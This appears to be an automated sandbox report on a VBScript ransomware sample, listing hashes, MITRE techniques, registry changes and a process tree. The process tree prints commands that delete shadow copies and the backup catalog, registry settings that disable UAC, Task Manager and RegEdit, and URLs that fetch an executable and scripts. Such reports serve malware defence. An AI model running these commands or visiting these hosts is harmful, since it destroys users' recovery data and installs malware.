3b39fb55fdfa391dc03c40197b88165c18a260bf9b171a46622c9304c7c38d53

max time kernel
9s
max time network
28s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
31-10-2024 08:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LCrypt0rX.vbs
Size

22KB
MD5

f25a640ad8b8ea3b0f63ae8959c129a1
SHA1

eadb43ef97823955f8b30a4e621e5422f8894afe
SHA256

3b39fb55fdfa391dc03c40197b88165c18a260bf9b171a46622c9304c7c38d53
SHA512

6964a4b78972d0fc0be9bebd2a3752a63b261281920f1b0bac2f9c9fb7215a268b2cb3258975f417df5e790c9c89da4f9ec8015f7e57b1cf0b58d2298249c524
SSDEEP

384:t0GbplStxYHQHSH7l+i/HVn2jv1QayXwA+sxQ+E6O:LJR2iY+EF

Score

10^/10

defense_evasion discovery evasion execution impact persistence ransomware trojan

Malware Config

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2324	wscript.exe
5	2324	wscript.exe
7	2324	wscript.exe

Blocks application from running via registry modification 3 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "msconfig.exe"	wscript.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2808	wbadmin.exe

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	wscript.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpamScript = "C:\\Windows\\System32\\haha.vbs"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wins32BugFix = "C:\\Windows\\System32\\wins32bugfix.vbs"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyStartupScript = "C:\\Users\\Admin\\AppData\\Local\\Temp\\LCrypt0rX.vbs"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iamthedoom = "C:\\Windows\\System32\\iamthedoom.bat"	wscript.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wscript.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\System32\iamthedoom.bat	wscript.exe
File opened for modification	C:\Windows\System32\iamthedoom.bat	wscript.exe
File created	C:\Windows\System32\haha.vbs	wscript.exe
File opened for modification	C:\Windows\System32\haha.vbs	wscript.exe
File created	C:\Windows\System32\wins32bugfix.vbs	wscript.exe
File opened for modification	C:\Windows\System32\wins32bugfix.vbs	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
536	vssadmin.exe

Kills process with taskkill 8 IoCs

evasion

pid	Process
3844	taskkill.exe
4056	taskkill.exe
1648	taskkill.exe
4204	taskkill.exe
4160	taskkill.exe
4308	taskkill.exe
1692	taskkill.exe
3044	taskkill.exe

Modifies Control Panel 1 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\MACHINE\Control Panel\Mouse	wscript.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{370C0311-9762-11EF-A094-FE6EB537C9A6} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{36D6D1E1-9762-11EF-A094-FE6EB537C9A6} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{36E233F1-9762-11EF-A094-FE6EB537C9A6} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{37244601-9762-11EF-A094-FE6EB537C9A6} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
2668	notepad.exe
4236	notepad.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeBackupPrivilege	1900	vssvc.exe
Token: SeRestorePrivilege	1900	vssvc.exe
Token: SeAuditPrivilege	1900	vssvc.exe
Token: SeBackupPrivilege	2908	wbengine.exe
Token: SeRestorePrivilege	2908	wbengine.exe
Token: SeSecurityPrivilege	2908	wbengine.exe
Token: SeDebugPrivilege	3044	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	3844	taskkill.exe
Token: SeSystemtimePrivilege	3900	cmd.exe
Token: SeSystemtimePrivilege	3900	cmd.exe

Suspicious use of SetWindowsHookEx 26 IoCs

pid	Process
1592	iexplore.exe
1592	iexplore.exe
884	iexplore.exe
884	iexplore.exe
2620	iexplore.exe
2620	iexplore.exe
2404	iexplore.exe
2404	iexplore.exe
1500	iexplore.exe
1500	iexplore.exe
1576	iexplore.exe
1576	iexplore.exe
2904	iexplore.exe
2904	iexplore.exe
992	iexplore.exe
992	iexplore.exe
892	iexplore.exe
892	iexplore.exe
2608	iexplore.exe
2060	iexplore.exe
2608	iexplore.exe
2060	iexplore.exe
1552	iexplore.exe
1552	iexplore.exe
1960	iexplore.exe
1960	iexplore.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1416 wrote to memory of 2324	1416	WScript.exe	31
PID 1416 wrote to memory of 2324	1416	WScript.exe	31
PID 1416 wrote to memory of 2324	1416	WScript.exe	31
PID 2324 wrote to memory of 2960	2324	wscript.exe	32
PID 2324 wrote to memory of 2960	2324	wscript.exe	32
PID 2324 wrote to memory of 2960	2324	wscript.exe	32
PID 2960 wrote to memory of 536	2960	cmd.exe	34
PID 2960 wrote to memory of 536	2960	cmd.exe	34
PID 2960 wrote to memory of 536	2960	cmd.exe	34
PID 2324 wrote to memory of 840	2324	wscript.exe	39
PID 2324 wrote to memory of 840	2324	wscript.exe	39
PID 2324 wrote to memory of 840	2324	wscript.exe	39
PID 840 wrote to memory of 2808	840	cmd.exe	41
PID 840 wrote to memory of 2808	840	cmd.exe	41
PID 840 wrote to memory of 2808	840	cmd.exe	41
PID 2324 wrote to memory of 2668	2324	wscript.exe	45
PID 2324 wrote to memory of 2668	2324	wscript.exe	45
PID 2324 wrote to memory of 2668	2324	wscript.exe	45
PID 2324 wrote to memory of 2556	2324	wscript.exe	46
PID 2324 wrote to memory of 2556	2324	wscript.exe	46
PID 2324 wrote to memory of 2556	2324	wscript.exe	46
PID 2324 wrote to memory of 2004	2324	wscript.exe	48
PID 2324 wrote to memory of 2004	2324	wscript.exe	48
PID 2324 wrote to memory of 2004	2324	wscript.exe	48
PID 2324 wrote to memory of 2056	2324	wscript.exe	49
PID 2324 wrote to memory of 2056	2324	wscript.exe	49
PID 2324 wrote to memory of 2056	2324	wscript.exe	49
PID 2324 wrote to memory of 1692	2324	wscript.exe	50
PID 2324 wrote to memory of 1692	2324	wscript.exe	50
PID 2324 wrote to memory of 1692	2324	wscript.exe	50
PID 2556 wrote to memory of 1592	2556	cmd.exe	52
PID 2556 wrote to memory of 1592	2556	cmd.exe	52
PID 2556 wrote to memory of 1592	2556	cmd.exe	52
PID 2056 wrote to memory of 3044	2056	wscript.exe	53
PID 2056 wrote to memory of 3044	2056	wscript.exe	53
PID 2056 wrote to memory of 3044	2056	wscript.exe	53
PID 2004 wrote to memory of 2672	2004	wscript.exe	54
PID 2004 wrote to memory of 2672	2004	wscript.exe	54
PID 2004 wrote to memory of 2672	2004	wscript.exe	54
PID 2556 wrote to memory of 2620	2556	cmd.exe	55
PID 2556 wrote to memory of 2620	2556	cmd.exe	55
PID 2556 wrote to memory of 2620	2556	cmd.exe	55
PID 2556 wrote to memory of 2604	2556	cmd.exe	56
PID 2556 wrote to memory of 2604	2556	cmd.exe	56
PID 2556 wrote to memory of 2604	2556	cmd.exe	56
PID 2556 wrote to memory of 1500	2556	cmd.exe	57
PID 2556 wrote to memory of 1500	2556	cmd.exe	57
PID 2556 wrote to memory of 1500	2556	cmd.exe	57
PID 2556 wrote to memory of 884	2556	cmd.exe	58
PID 2556 wrote to memory of 884	2556	cmd.exe	58
PID 2556 wrote to memory of 884	2556	cmd.exe	58
PID 2556 wrote to memory of 2404	2556	cmd.exe	59
PID 2556 wrote to memory of 2404	2556	cmd.exe	59
PID 2556 wrote to memory of 2404	2556	cmd.exe	59
PID 2556 wrote to memory of 1576	2556	cmd.exe	60
PID 2556 wrote to memory of 1576	2556	cmd.exe	60
PID 2556 wrote to memory of 1576	2556	cmd.exe	60
PID 2672 wrote to memory of 760	2672	wscript.exe	61
PID 2672 wrote to memory of 760	2672	wscript.exe	61
PID 2672 wrote to memory of 760	2672	wscript.exe	61
PID 2556 wrote to memory of 892	2556	cmd.exe	62
PID 2556 wrote to memory of 892	2556	cmd.exe	62
PID 2556 wrote to memory of 892	2556	cmd.exe	62
PID 2556 wrote to memory of 668	2556	cmd.exe	63

System policy modification 1 TTPs 15 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableCMD = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "msconfig.exe"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\InactivityTimeoutSecs = "0"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1"	wscript.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LCrypt0rX.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1416
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\LCrypt0rX.vbs" /elevated
  2⤵
  - UAC bypass
  - Blocklisted process makes network request
  - Blocks application from running via registry modification
  - Disables RegEdit via registry modification
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Drops file in System32 directory
  - Modifies Control Panel
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:2324
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2960
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:536
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c wbadmin delete catalog -quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:840
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog -quiet
      4⤵
      Deletes backup catalog
      PID:2808
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\READMEPLEASE.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:2668
- - C:\Windows\System32\cmd.exe
    cmd /c ""C:\Windows\System32\iamthedoom.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2556
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1592
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1592 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1052
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2620
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2620 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1600
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:2604
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1500
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1500 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2140
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:884
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:884 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1596
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2404
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2404 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:980
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1576
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1576 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3164
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:892
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:275457 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:3208
  - - C:\Windows\system32\calc.exe
      calc
      4⤵
      PID:668
  - - C:\Program Files\Internet Explorer\iexplore.exe
